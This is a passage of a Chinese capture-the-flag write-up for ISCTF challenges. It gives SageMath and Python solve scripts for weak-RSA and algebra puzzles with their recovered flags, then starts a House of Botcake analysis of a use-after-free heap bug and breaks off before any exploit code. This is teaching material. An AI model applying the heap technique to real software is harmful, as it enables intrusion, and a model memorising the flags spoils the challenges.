n<br>print(\"\u6b63\u5728\u5206\u89e3 n...\")<br>try:<br> &nbsp;  factors = factor(n)<br> &nbsp;  print(\"n \u7684\u56e0\u5b50\u5206\u89e3: \" + str(factors))<br> &nbsp; &nbsp;<br> &nbsp;  # \u8ba1\u7b97\u6b27\u62c9\u51fd\u6570 \u03c6(n)<br> &nbsp;  phi_n = euler_phi(n)<br> &nbsp;  print(\"\u03c6(n) = \" + str(phi_n))<br>except Exception as e:<br> &nbsp;  print(\"\u5206\u89e3\u5931\u8d25: \" + str(e))<br> &nbsp;  # \u5982\u679c\u65e0\u6cd5\u5206\u89e3\uff0c\u5047\u8bbe n \u662f\u7d20\u6570<br> &nbsp;  print(\"\u5047\u8bbe n \u662f\u7d20\u6570\")<br> &nbsp;  phi_n = n - 1<br>\u200b<br>print()<br>\u200b<br># \u8ba1\u7b97 2^t mod \u03c6(n)<br>print(\"\u8ba1\u7b97 2^t mod \u03c6(n)...\")<br>exp_mod_phi = power_mod(2, t, phi_n)<br>print(\"2^t mod \u03c6(n) = \" + 
str(exp_mod_phi))<br>\u200b<br># \u8ba1\u7b97 l = 2^(2^t) mod n = 2^(2^t mod \u03c6(n)) mod n<br>print()<br>print(\"\u8ba1\u7b97 l = 2^(2^t mod \u03c6(n)) mod n...\")<br>l = power_mod(2, exp_mod_phi, n)<br>print(\"l = \" + str(l))<br>\u200b<br># \u89e3\u5bc6: flag = c ^ l<br>print()<br>print(\"\u89e3\u5bc6 flag...\")<br>flag_long = c ^^ l  # SageMath \u4e2d\u7684\u5f02\u6216\u8fd0\u7b97\u7b26<br>print(\"flag (\u6574\u6570) = \" + str(flag_long))<br>\u200b<br># \u8f6c\u6362\u4e3a\u5b57\u8282<br>print()<br>print(\"\u8f6c\u6362\u4e3a\u5b57\u8282...\")<br># \u5c06\u6574\u6570\u8f6c\u6362\u4e3a\u5b57\u8282\u5217\u8868<br>flag_digits = flag_long.digits(256)<br>flag_bytes = bytes(reversed(flag_digits))<br>\u200b<br>try:<br> &nbsp;  flag_str = flag_bytes.decode('utf-8', errors='ignore')<br> &nbsp;  print(\"\\n\" + \"=\" * 60)<br> &nbsp;  print(\"\u89e3\u5bc6\u540e\u7684 flag: \" + flag_str)<br> &nbsp;  print(\"=\" * 60)<br> &nbsp;  print(\"flag (hex): \" + flag_bytes.hex())<br>except Exception as e:<br> &nbsp;  print(\"UTF-8 \u89e3\u7801\u5931\u8d25: \" + str(e))<br> &nbsp;  print(\"flag (hex): \" + flag_bytes.hex())<br> &nbsp;  # \u5c1d\u8bd5\u76f4\u63a5\u663e\u793a\u5b57\u8282<br> &nbsp;  print(\"flag (bytes): \" + str(flag_bytes))<\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>============================================================<br>Power Tower \u89e3\u5bc6<br>============================================================<br>t = 6039738711082505929<br>n = 107502945843251244337535082460697583639357473016005252008262865481138355040617<br>c = 114092817888610184061306568177474033648737936326143099257250807529088213565247<br>\u200b<br>\u6b63\u5728\u5206\u89e3 n...<br>n \u7684\u56e0\u5b50\u5206\u89e3: 127 * 841705194007 * 1005672644717572752052474808610481144121914956393489966622615553<br>\u03c6(n) = 106656465954594992227312203077713006587965800635814353306369389060697410445312<br>\u200b<br>\u8ba1\u7b97 2^t mod \u03c6(n)...<br>2^t mod \u03c6(n) = 
63628789584090558595465598091196928076720283286383800204368188448772762091520<br>\u200b<br>\u8ba1\u7b97 l = 2^(2^t mod \u03c6(n)) mod n...<br>l = 82062069866179877089267477826918688212074322751651681520625309711026709241410<br>\u200b<br>\u89e3\u5bc6 flag...<br>flag (\u6574\u6570) = 33165950942018378556776034296645277066869513684055746490680244406481376584061<br>\u200b<br>\u8f6c\u6362\u4e3a\u5b57\u8282...<br>\u200b<br>============================================================<br>\u89e3\u5bc6\u540e\u7684 flag: ISCTF{Euler_1s_v3ry|useful!!!!!}<br>============================================================<br>flag (hex): 49534354467b45756c65725f31735f763372797c75736566756c21212121217d<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u5c0f\u84dd\u9ca8\u7684RSA\u5bc6\u6587<\/h2>\n\n\n\n<p>\u9898\u76ee\u63d0\u4f9b\u4e86\u4e00\u4e2a Python \u811a\u672c <code>task.py<\/code> \u548c\u8f93\u51fa\u6587\u4ef6 <code>output.txt<\/code>\u3002<\/p>\n\n\n\n<p><strong>\u52a0\u5bc6\u903b\u8f91\u5206\u6790<\/strong><\/p>\n\n\n\n<p>\u67e5\u770b <code>task.py<\/code>\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>e = 3<br>N = getPrime(512) * getPrime(512)<br>\u200b<br># ... 
\u7701\u7565\u90e8\u5206\u4ee3\u7801 ...<br>\u200b<br>aes_key = secrets.token_bytes(16)<br>m = bytes_to_long(aes_key)<br>\u200b<br>f = a2 * (m * m) + a1 * m + a0<br>\u200b<br>c = (pow(m, e) + f) % N<\/code><\/pre>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>AES \u5bc6\u94a5<\/strong>: <code>m<\/code> \u662f\u4e00\u4e2a 128 \u4f4d\uff0816\u5b57\u8282\uff09\u7684\u968f\u673a\u6574\u6570\u3002<\/li>\n\n\n\n<li><strong>RSA \u6a21\u6570<\/strong>: <code>N<\/code> \u662f\u4e24\u4e2a 512 \u4f4d\u7d20\u6570\u7684\u4e58\u79ef\uff0c\u957f\u5ea6\u7ea6\u4e3a 1024 \u4f4d\u3002<\/li>\n\n\n\n<li><strong>\u52a0\u5bc6\u65b9\u7a0b<\/strong>:$$<br>c \\equiv m^3 + a_2 m^2 + a_1 m + a_0 \\pmod N<br>$$<\/li>\n<\/ol>\n\n\n\n<p><strong>\u6570\u503c\u5927\u5c0f\u4f30\u7b97<\/strong><\/p>\n\n\n\n<p>\u6211\u4eec\u9700\u8981\u5224\u65ad\u6a21 N \u8fd0\u7b97\u662f\u5426\u5bf9\u7ed3\u679c\u4ea7\u751f\u4e86\u5f71\u54cd\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>m \u662f 128 \u4f4d\u6574\u6570\uff0c\u5373 $$<br>m &lt; 2^{128}<br>$$<br>\u3002<\/li>\n\n\n\n<li>$$<br>m^3 &lt; (2^{128})^3 = 2^{384}<br>$$<br>\u3002<\/li>\n\n\n\n<li><code>output.txt<\/code> \u4e2d\u7ed9\u51fa\u4e86 <code>a2_high = 9012778<\/code> ($$<br>\\approx 2^{23}<br>$$<br>)\uff0c\u4e14 <code>LOW_BITS = 16<\/code>\u3002<\/li>\n\n\n\n<li>$$<br>a_2 \\approx 2^{23} \\cdot 2^{16} = 2^{39}<br>$$<br>\u3002<\/li>\n\n\n\n<li>$$<br>a_2 m^2 \\approx 2^{39} \\cdot 2^{256} = 2^{295}<br>$$<\/li>\n\n\n\n<li>$$<br>a_1, a_0<br>$$<br>\u76f8\u5bf9\u8f83\u5c0f\u3002<\/li>\n<\/ul>\n\n\n\n<p>\u6574\u4e2a\u591a\u9879\u5f0f\u7684\u503c<\/p>\n\n\n\n<p>$$<br>m^3 + a_2 m^2 + a_1 m + a_0<br>$$<\/p>\n\n\n\n<p>\u7684\u91cf\u7ea7\u7ea6\u4e3a<\/p>\n\n\n\n<p>$$<br>2^{384}<br>$$<\/p>\n\n\n\n<p>\u3002 \u800c\u6a21\u6570 N \u7684\u91cf\u7ea7\u7ea6\u4e3a<\/p>\n\n\n\n<p>$$<br>2^{1024}<br>$$<\/p>\n\n\n\n<p>\u3002<\/p>\n\n\n\n<p>\u7531\u4e8e<\/p>\n\n\n\n<p>$$<br>2^{384} \\ll 2^{1024}<br>$$<\/p>\n\n\n\n<p>\uff0c\u6240\u4ee5 <strong>\u6a21 N 
\u8fd0\u7b97\u6ca1\u6709\u53d1\u751f\u622a\u65ad<\/strong>\u3002\u65b9\u7a0b\u5728\u6574\u6570\u57df\u4e0a\u76f4\u63a5\u6210\u7acb\uff1a<\/p>\n\n\n\n<p>$$<br>m^3 + a_2 m^2 + a_1 m + a_0 &#8211; c = 0<br>$$<\/p>\n\n\n\n<p><strong>\u672a\u77e5\u6570\u5904\u7406<\/strong><\/p>\n\n\n\n<p>\u9898\u76ee\u4e2d $a_2$ \u5e76\u4e0d\u5b8c\u5168\u5df2\u77e5\uff0c\u53ea\u7ed9\u4e86\u9ad8\u4f4d\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">a2_high = a2 &gt;&gt; LOW_BITS<\/pre>\n\n\n\n<p>\u8fd9\u610f\u5473\u7740 $a_2$ \u7684\u4f4e 16 \u4f4d\u662f\u672a\u77e5\u7684\u3002\u6211\u4eec\u53ef\u4ee5\u8868\u793a\u4e3a\uff1a<\/p>\n\n\n\n<p>$$<br>a_2 = (a2\\_high \\ll 16) + \\delta<br>$$<\/p>\n\n\n\n<p>\u5176\u4e2d<\/p>\n\n\n\n<p>$$<br>0 \\le \\delta &lt; 2^{16} = 65536<br>$$<\/p>\n\n\n\n<p><strong>\u89e3\u9898\u601d\u8def<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u7206\u7834 <\/strong>$$<br>$\\delta$<br>$$<br>\uff1a\u904d\u5386 $0$ \u5230 $65535$ \u7684\u6240\u6709\u53ef\u80fd\u503c\u3002<\/li>\n\n\n\n<li><strong>\u6784\u9020\u65b9\u7a0b<\/strong>\uff1a\u5bf9\u4e8e\u6bcf\u4e2a $\\delta$\uff0c\u8ba1\u7b97\u51fa\u5b8c\u6574\u7684 $a_2$\uff0c\u5f97\u5230\u786e\u5b9a\u7684\u591a\u9879\u5f0f\u65b9\u7a0b $f(m) = m^3 + a_2 m^2 + a_1 m + a_0 &#8211; c = 0$\u3002<\/li>\n\n\n\n<li><strong>\u6c42\u89e3\u65b9\u7a0b<\/strong>\uff1a\u5728\u5b9e\u6570\u57df\u6216\u6574\u6570\u57df\u6c42\u89e3\u8be5\u4e00\u5143\u4e09\u6b21\u65b9\u7a0b\u3002\u7531\u4e8e $m$ \u662f\u6574\u6570\uff0c\u6211\u4eec\u53ea\u9700\u8981\u5173\u6ce8\u6b63\u6574\u6570\u89e3\u3002\u53ef\u4ee5\u4f7f\u7528\u4e8c\u5206\u67e5\u627e\uff08\u56e0\u4e3a\u51fd\u6570\u5355\u8c03\u9012\u589e\uff09\u6216 SageMath \u7684\u6c42\u6839\u51fd\u6570\u3002<\/li>\n\n\n\n<li><strong>\u9a8c\u8bc1\u89e3<\/strong>\uff1a\u5f97\u5230\u7684 $m$ \u8f6c\u6362\u4e3a\u5b57\u8282\u4e32\u4f5c\u4e3a AES \u5bc6\u94a5\uff0c\u5c1d\u8bd5\u89e3\u5bc6\u5bc6\u6587 <code>ct<\/code>\u3002\u5982\u679c\u89e3\u5bc6\u6210\u529f\uff08Padding 
\u6b63\u786e\uff09\uff0c\u5219\u5f97\u5230 Flag\u3002<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>from Crypto.Util.number import long_to_bytes<br>from Crypto.Cipher import AES<br>from Crypto.Util.Padding import unpad<br>\u200b<br># \u4ece output.txt \u8bfb\u53d6\u6570\u503c<br>c = 3756824985347508967549776773725045773059311839370527149219720084008312247164501688241698562854942756369420003479117<br>a2_high = 9012778<br>LOW_BITS = 16<br>a1 = 621315<br>a0 = 452775142<br>iv = bytes.fromhex(\"bf38e64bb5c1b069a07b7d1d046a9010\")<br>ct = bytes.fromhex(\"8966006c4724faf53883b56a1a8a08ee17b1535e1657c16b3b129ee2d2e389744c943014eb774cd24a5d0f7ad140276fdec72eb985b6de67b8e4674b0bcdc4a5\")<br>\u200b<br># \u521d\u59cb\u5316\u591a\u9879\u5f0f\u73af<br>R = PolynomialRing(ZZ, 'x')<br>x = R.gen()<br>\u200b<br>print(\"\u5f00\u59cb\u7206\u7834 delta...\")<br>\u200b<br># \u7206\u7834 a2 \u7684\u4f4e 16 \u4f4d<br>for delta in range(1 &lt;&lt; LOW_BITS):<br> &nbsp; &nbsp;# \u6784\u9020\u5b8c\u6574\u7684 a2<br> &nbsp; &nbsp;a2 = (a2_high &lt;&lt; LOW_BITS) + delta<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# \u6784\u9020\u65b9\u7a0b: x^3 + a2*x^2 + a1*x + a0 - c = 0<br> &nbsp; &nbsp;f = x**3 + a2*x**2 + a1*x + a0 - c<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# \u5728\u6574\u6570\u73af\u4e0a\u6c42\u6839<br> &nbsp; &nbsp;roots = f.roots()<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;for r, mult in roots:<br> &nbsp; &nbsp; &nbsp; &nbsp;if r &gt; 0:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;m = Integer(r)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(f\"\u627e\u5230\u53ef\u80fd\u7684 m (delta={delta}): {m}\")<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u5c1d\u8bd5 AES \u89e3\u5bc6<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;aes_key = long_to_bytes(m).rjust(16, b'\\0')<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;cipher = AES.new(aes_key, AES.MODE_CBC, iv=iv)<br> &nbsp; 
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;decrypted = cipher.decrypt(ct)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;flag = unpad(decrypted, 16)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(f\"Flag: {flag.decode()}\")<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;exit(0)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;except Exception as e:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# Padding \u9519\u8bef\u8bf4\u660e\u5bc6\u94a5\u4e0d\u5bf9<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;pass<\/code><\/pre>\n\n\n\n<p><strong>\u8fd0\u884c\u7ed3\u679c<\/strong><\/p>\n\n\n\n<p>\u8fd0\u884c\u811a\u672c\u540e\uff0c\u5728 <code>delta = 10219<\/code> \u65f6\u627e\u5230\u6b63\u786e\u7684 $m$\uff0c\u89e3\u5bc6\u5f97\u5230 Flag\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Found m for delta=10219: &#91;AES Key Integer]<br>Flag: ISCTF{i7_533M5_Lik3_You_R34lLy_UNd3R574nd_Polinomials_4nD_RSA}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">baby_equation<\/h2>\n\n\n\n<p>\u9898\u76ee\u63d0\u4f9b\u4e86\u4e00\u4e2a Python \u811a\u672c <code>baby_equation.py<\/code>\uff0c\u5176\u4e2d\u7ed9\u51fa\u4e86\u4e09\u4e2a\u5173\u4e8e\u672a\u77e5\u6570<\/p>\n\n\n\n<p>$$<br>a, b, c<br>$$<\/p>\n\n\n\n<p>\u7684\u65b9\u7a0b\u4ee5\u53ca\u5bf9\u5e94\u7684\u5e38\u6570<\/p>\n\n\n\n<p>$$<br>K_1, K_2, K_3<br>$$<\/p>\n\n\n\n<p>\u3002\u5176\u4e2d c \u662f flag \u8f6c\u6362\u6210\u7684\u6574\u6570\u3002<\/p>\n\n\n\n<p>\u65b9\u7a0b\u7ec4\u5982\u4e0b\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>$$<br>4b^6 - 2a^3 + 3ac = K_1<br>$$<\/li>\n\n\n\n<li>$$<br>b^5 + 6c^3 + 2abc = K_2<br>$$<\/li>\n\n\n\n<li>$$<br>3a^3 - 3ac - 3b^6 = K_3<br>$$<\/li>\n<\/ol>\n\n\n\n<p><strong>1. 
\u89c2\u5bdf\u65b9\u7a0b\u7ed3\u6784<\/strong><\/p>\n\n\n\n<p>\u89c2\u5bdf\u65b9\u7a0b (1) \u548c (3)\uff0c\u6211\u4eec\u53ef\u4ee5\u53d1\u73b0\u5404\u9879\u7684\u5e42\u6b21\u8f83\u9ad8\uff0c\u7279\u522b\u662f $b^6$\u3002\u5982\u679c\u6211\u4eec\u5c1d\u8bd5\u5c06\u8fd9\u4e24\u4e2a\u65b9\u7a0b\u76f8\u52a0\uff0c\u4f1a\u6d88\u53bb $ac$ \u9879\uff0c\u5e76\u5408\u5e76 $a^3$ \u548c<\/p>\n\n\n\n<p>$$<br>b^6<br>$$<\/p>\n\n\n\n<p>\u9879\u3002<\/p>\n\n\n\n<p>$$<br>\\begin{aligned} K_1 + K_3 &amp;= (4b^6 - 2a^3 + 3ac) + (3a^3 - 3ac - 3b^6) \\\\ &amp;= (4b^6 - 3b^6) + (3a^3 - 2a^3) + (3ac - 3ac) \\\\ &amp;= b^6 + a^3 \\end{aligned}<br>$$<\/p>\n\n\n\n<p>\u4ee4<\/p>\n\n\n\n<p>$$<br>S = K_1 + K_3<br>$$<\/p>\n\n\n\n<p>\uff0c\u5219\u6709\uff1a<\/p>\n\n\n\n<p>$$<br>S = a^3 + b^6 \\quad \\dots(4)<br>$$<\/p>\n\n\n\n<p><strong>2. \u8fdb\u4e00\u6b65\u6d88\u5143\u4e0e\u4f30\u7b97<\/strong><\/p>\n\n\n\n<p>\u56de\u5230\u65b9\u7a0b (1)\uff1a<\/p>\n\n\n\n<p>$$<br>K_1 = 4b^6 - 2a^3 + 3ac<br>$$<\/p>\n\n\n\n<p>\u3002 \u6211\u4eec\u53ef\u4ee5\u5229\u7528 (4) \u5f0f\u5c06<\/p>\n\n\n\n<p>$$<br>a^3<br>$$<\/p>\n\n\n\n<p>\u66ff\u6362\u6389\uff0c\u6216\u8005\u5c1d\u8bd5\u4f30\u7b97 b \u7684\u5927\u5c0f\u3002<\/p>\n\n\n\n<p>\u7531 (4) \u5f0f\u5f97<\/p>\n\n\n\n<p>$$<br>a^3 = S - b^6<br>$$<\/p>\n\n\n\n<p>\uff0c\u4ee3\u5165 (1) \u5f0f\uff1a<\/p>\n\n\n\n<p>$$<br>\\begin{aligned} K_1 &amp;= 4b^6 - 2(S - b^6) + 3ac \\\\ K_1 &amp;= 4b^6 - 2S + 2b^6 + 3ac \\\\ K_1 + 2S &amp;= 6b^6 + 3ac \\end{aligned}<br>$$<\/p>\n\n\n\n<p>\u6ce8\u610f\u5230 $b^6$ \u662f\u4e00\u4e2a\u516d\u6b21\u5e42\u9879\uff0c$ac$ \u662f\u4e8c\u6b21\u9879\uff08\u5047\u8bbe a, b, c \u7684\u6570\u91cf\u7ea7\u76f8\u5dee\u4e0d\u662f\u7279\u522b\u5de8\u5927\uff09\u3002\u5728\u6570\u503c\u6781\u5927\u65f6\uff0c$6b^6$ \u7684\u503c\u5c06\u8fdc\u8fdc\u5927\u4e8e $3ac$\u3002 \u56e0\u6b64\uff0c\u6211\u4eec\u53ef\u4ee5\u8fd1\u4f3c\u8ba4\u4e3a\uff1a<\/p>\n\n\n\n<p>$$<br>6b^6 \\approx K_1 + 
2S<br>$$<\/p>\n\n\n\n<p>$$<br>b \\approx \\sqrt[6]{\\frac{K_1 + 2S}{6}}<br>$$<\/p>\n\n\n\n<p><strong>3. \u6c42\u89e3\u6b65\u9aa4<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u8ba1\u7b97 $S = K_1 + K_3$\u3002<\/li>\n\n\n\n<li>\u4f30\u7b97 $$<br>b_{approx} = \\lfloor \\sqrt[6]{(K_1 + 2S)\/6} \\rfloor<br>$$<br>\u3002<\/li>\n\n\n\n<li>\u5728\u4f30\u7b97\u503c $$<br>b_{approx}<br>$$<br>\u9644\u8fd1\u5c0f\u8303\u56f4\u7206\u7834 b\u3002<\/li>\n\n\n\n<li>\u5bf9\u4e8e\u6bcf\u4e00\u4e2a\u5047\u8bbe\u7684 b\uff0c\u8ba1\u7b97 $$<br>a^3 = S - b^6<br>$$<br>\u3002\u9a8c\u8bc1 $S - b^6$ \u662f\u5426\u4e3a\u5b8c\u5168\u7acb\u65b9\u6570\uff0c\u5982\u679c\u662f\uff0c\u5219\u6c42\u51fa a\u3002<\/li>\n\n\n\n<li>\u6709\u4e86 a \u548c b \u540e\uff0c\u5229\u7528\u65b9\u7a0b (1) $$<br>3ac = K_1 - 4b^6 + 2a^3<br>$$<br>\u6c42\u51fa c\uff1a$$<br>c = \\frac{K_1 - 4b^6 + 2a^3}{3a}<br>$$<\/li>\n\n\n\n<li>\u5c06 $c$ \u8f6c\u6362\u4e3a\u5b57\u8282\u4e32\u5373\u5f97\u5230 flag\u3002<\/li>\n<\/ol>\n\n\n\n<p>\u5b8c\u6574\u89e3\u5bc6\u811a\u672c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from Crypto.Util.number import long_to_bytes<br>\u200b<br>def integer_root(n, k):<br> &nbsp; &nbsp;\"\"\"\u8ba1\u7b97 n \u7684 k \u6b21\u65b9\u6839\u7684\u6574\u6570\u90e8\u5206\"\"\"<br> &nbsp; &nbsp;if n &lt; 0:<br> &nbsp; &nbsp; &nbsp; &nbsp;if k % 2 == 0: return None<br> &nbsp; &nbsp; &nbsp; &nbsp;return -integer_root(-n, k)<br> &nbsp; &nbsp;if n == 0: return 0<br> &nbsp; &nbsp;u, s = n, n + 1<br> &nbsp; &nbsp;while u &lt; s:<br> &nbsp; &nbsp; &nbsp; &nbsp;s = u<br> &nbsp; &nbsp; &nbsp; &nbsp;t = (k - 1) * s + n \/\/ pow(s, k - 1)<br> &nbsp; &nbsp; &nbsp; &nbsp;u = t \/\/ k<br> &nbsp; &nbsp;return s<br>\u200b<br>def check_perfect_cube(n):<br> &nbsp; &nbsp;\"\"\"\u5224\u65ad\u662f\u5426\u4e3a\u5b8c\u5168\u7acb\u65b9\u6570\"\"\"<br> &nbsp; &nbsp;root = integer_root(n, 3)<br> &nbsp; &nbsp;if root * root * root == n:<br> &nbsp; &nbsp; &nbsp; &nbsp;return True, root<br> &nbsp; 
&nbsp;return False, None<br>\u200b<br>def solve():<br> &nbsp; &nbsp;# \u9898\u76ee\u6570\u636e<br> &nbsp; &nbsp;K1 = 5530346600323339885232820545798418499625132786869393636420197124606005490078041505765918120769293936395609675704197197479866186297686468133906640256390919799453701894382992223127374374212586492263661287287954143417128958298503464448<br> &nbsp; &nbsp;K3 = -5530346600323339885232820545798418499625132786869393636420197035566805062064534503704976756468319888650441668826363984844327206056424439752726283862026042410921197396370839233560708886006884569969932749615838070243922866371345910111<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# 1. \u8ba1\u7b97 S = a^3 + b^6<br> &nbsp; &nbsp;S = K1 + K3<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# 2. \u4f30\u7b97 b<br> &nbsp; &nbsp;# 6b^6 \u2248 K1 + 2S<br> &nbsp; &nbsp;val = K1 + 2*S<br> &nbsp; &nbsp;b_approx = integer_root(val \/\/ 6, 6)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;print(f\"Searching for b around {b_approx}...\")<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# 3. 
\u7206\u7834 b \u5e76\u6c42\u89e3 a, c<br> &nbsp; &nbsp;for delta in range(-100, 100):<br> &nbsp; &nbsp; &nbsp; &nbsp;b = b_approx + delta<br> &nbsp; &nbsp; &nbsp; &nbsp;# \u68c0\u67e5 S - b^6 \u662f\u5426\u4e3a a^3<br> &nbsp; &nbsp; &nbsp; &nbsp;diff = S - b**6<br> &nbsp; &nbsp; &nbsp; &nbsp;is_cube, a = check_perfect_cube(diff)<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;if is_cube:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(f\"Found a: {a}\")<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(f\"Found b: {b}\")<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u4ee3\u56de\u65b9\u7a0b1\u6c42\u89e3 c<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# 3ac = K1 - 4b^6 + 2a^3<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;numerator = K1 - 4 * (b**6) + 2 * (a**3)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;denominator = 3 * a<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if denominator != 0 and numerator % denominator == 0:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;c = numerator \/\/ denominator<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;flag = long_to_bytes(c)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(f\"Flag: {flag.decode()}\")<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;except:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;pass<br>\u200b<br>if __name__ == \"__main__\":<br> &nbsp; &nbsp;solve()<\/code><\/pre>\n\n\n\n<p>\u8fd0\u884c\u811a\u672c\u5f97\u5230 flag\uff1a <code>ISCTF{y0u_93t_7h3_3qu4710n_50lv3}<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">tcache<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u67b6\u6784<\/strong>: 
AMD64<\/li>\n\n\n\n<li><strong>\u4fdd\u62a4<\/strong>:\n<ul class=\"wp-block-list\">\n<li>Full RELRO<\/li>\n\n\n\n<li>Canary found<\/li>\n\n\n\n<li>NX enabled<\/li>\n\n\n\n<li>PIE enabled<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Libc \u7248\u672c<\/strong>: Glibc 2.29<\/li>\n\n\n\n<li><strong>\u6f0f\u6d1e\u70b9<\/strong>:\n<ul class=\"wp-block-list\">\n<li><strong>UAF (Use-After-Free)<\/strong>: <code>delete<\/code> \u51fd\u6570\u91ca\u653e\u5185\u5b58\u540e\u672a\u5c06\u6307\u9488\u7f6e\u7a7a\uff08Dangling Pointer\uff09\uff0c\u4e14 <code>show<\/code> \u51fd\u6570\u672a\u68c0\u67e5 chunk \u662f\u5426\u88ab\u91ca\u653e\uff0c\u4ec5\u68c0\u67e5\u975e\u7a7a\u3002\u8fd9\u5141\u8bb8\u653b\u51fb\u8005\u8bfb\u53d6\u5df2\u91ca\u653e\u5806\u5757\u7684\u5185\u5bb9\uff08\u6cc4\u9732 Libc\uff09\u6216\u518d\u6b21\u64cd\u4f5c\u5df2\u91ca\u653e\u7684\u5806\u5757\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u9650\u5236<\/strong>: \u5168\u5c40\u6570\u7ec4 <code>nodes<\/code> \u5927\u5c0f\u4e3a 22\uff0c\u610f\u5473\u7740\u6211\u4eec\u6700\u591a\u53ea\u80fd\u8fdb\u884c 22 \u6b21 <code>add<\/code> \u64cd\u4f5c\u3002<\/li>\n<\/ul>\n\n\n\n<p><strong>House of Botcake<\/strong>\uff1a<\/p>\n\n\n\n<p>Glibc 2.29 \u5f15\u5165\u4e86\u5bf9 Tcache Double Free \u7684\u68c0\u67e5\uff08\u68c0\u67e5 chunk \u7684 <code>key<\/code> \u5b57\u6bb5\u662f\u5426\u7b49\u4e8e <code>tcache<\/code> \u7ed3\u6784\u4f53\u5730\u5740\uff09\u3002\u5982\u679c\u76f4\u63a5\u5bf9\u540c\u4e00\u4e2a chunk \u8fdb\u884c\u4e24\u6b21 <code>free<\/code>\uff0c\u4f1a\u89e6\u53d1 abort\u3002<\/p>\n\n\n\n<p>\u4e3a\u4e86\u7ed5\u8fc7\u8fd9\u4e2a\u68c0\u67e5\u5e76\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u5199\uff0c\u6211\u4eec\u4f7f\u7528 <strong>House of Botcake<\/strong> \u6280\u672f\u3002\u6838\u5fc3\u601d\u60f3\u662f\u5229\u7528 <strong>Unsorted Bin \u7684\u5408\u5e76\u673a\u5236<\/strong> \u6765\u6784\u9020 Tcache Chunk \u548c Unsorted Bin Chunk \u7684 
